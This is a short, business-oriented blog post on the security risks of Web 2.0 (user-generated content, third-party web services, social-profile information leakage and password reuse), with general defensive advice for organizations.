This article originally appeared on Verizon Business' ThinkForward blog. It is written by me with a different audience in mind and is business-centric. However, no harm in punting here too.
The computer industry loves a good buzzword and "Web 2.0" is no exception to this rule. Journalists have been using this buzzword for some time now and many of the top sites on the Internet (the likes of Facebook and Twitter) already make use of this Web 2.0 jazz, but what is it and what does it mean for security? Wikipedia describes Web 2.0 as, "the changing trends in the use of World Wide Web technology and web design that aim to enhance creativity, communications, secure information sharing, collaboration and functionality of the web." This mainly refers to JavaScript technology, which now seems like it has been about since the beginning of time. However, the Wikipedia entry does relate to the web changing - from static pages to dynamic and user-driven content, such as blogs, wikis and social networking sites. As all security savvy people know, with any new technology or trends come new security implications. It's a cat-and-mouse game out there. Web 2.0 now involves people heavily, which is a good thing for usability but not such a good thing for security. Let's look at some of the potential issues.
In at number one is user-generated content. Web 2.0 is all about allowing users to add their own content in the form of text and photos. If software security taught us anything, it was to never ever (ever!) trust input provided by the user. Input could be bad, malformed or just blatantly malicious. As the data will be saved on a backend database and then be referenced to generate content for other users, data validation just become even more important.
In at number two are web services. Web 2.0 allows different systems to be able communicate and interface with each other using a common API (Application Programming Interface, based on XML), also known as web services. For instance, this allows one web site the ability to pull photos from a third-party photo-sharing web site, interactive maps from another and content from a third. This is a huge change from the past where all data was taken from one source, often managed by the same organization.
This creates security implications in relation to trust. How do we know the third party is taking security seriously? A compromise that occurs at the third party can now negatively influence and affect your organization due to data being used (and trusted) to create content. The availability of web services also increases the possible attack vectors for an attacker.
In at number three are people and passwords. Web 2.0 blurs the boundaries between work and personal life. LinkedIn, Facebook and Twitter have dual uses both professionally and personally and often cross over. This has many security and reputation implications; however, I am most concerned about information leakage and weak passwords. Web 2.0 is built around community-driven sites, content for and by the users, and as such users are often provided with the ability to create personal profile pages. Facebook is a good example of this. The amount of information that can be gleaned from these unrestricted pages should not be underestimated. Information can be used in furthering attacks both externally and internally into an organization.
The second issue is passwords. Time and time again it has been documented that people are the weakest link in security and therefore education needs to start here. Human beings will often pick dictionary-based passwords, which are vulnerable to dictionary-based password attacks. However, for some time now the industry has stood up to this challenge by implementing password complexity, which requires special characters and password lengths. This has somewhat mitigated this vulnerability. Another issue is that users often reuse the same password across multiple sites and applications. Internally this isn't as much of a problem; however, this habit used over the Internet creates security implications that will only increase with more Web 2.0 sites.
Don't panic! Change is a good thing. But awareness of the security implications of how people are using the web needs to be acknowledged and factored into an organization's risk exposure. Education is always key to making sure employees are aware of the security policies of your organization. It is also a good chance to demonstrate how poor security can affect them personally, namely identity theft. Developers should consider new technologies to help them double check that user-generated content is safe. Finally, the risk of a compromise occurring via web services can be mitigated by conducting a security assessment on all endpoints where the web services interact including third parties to give added assurances.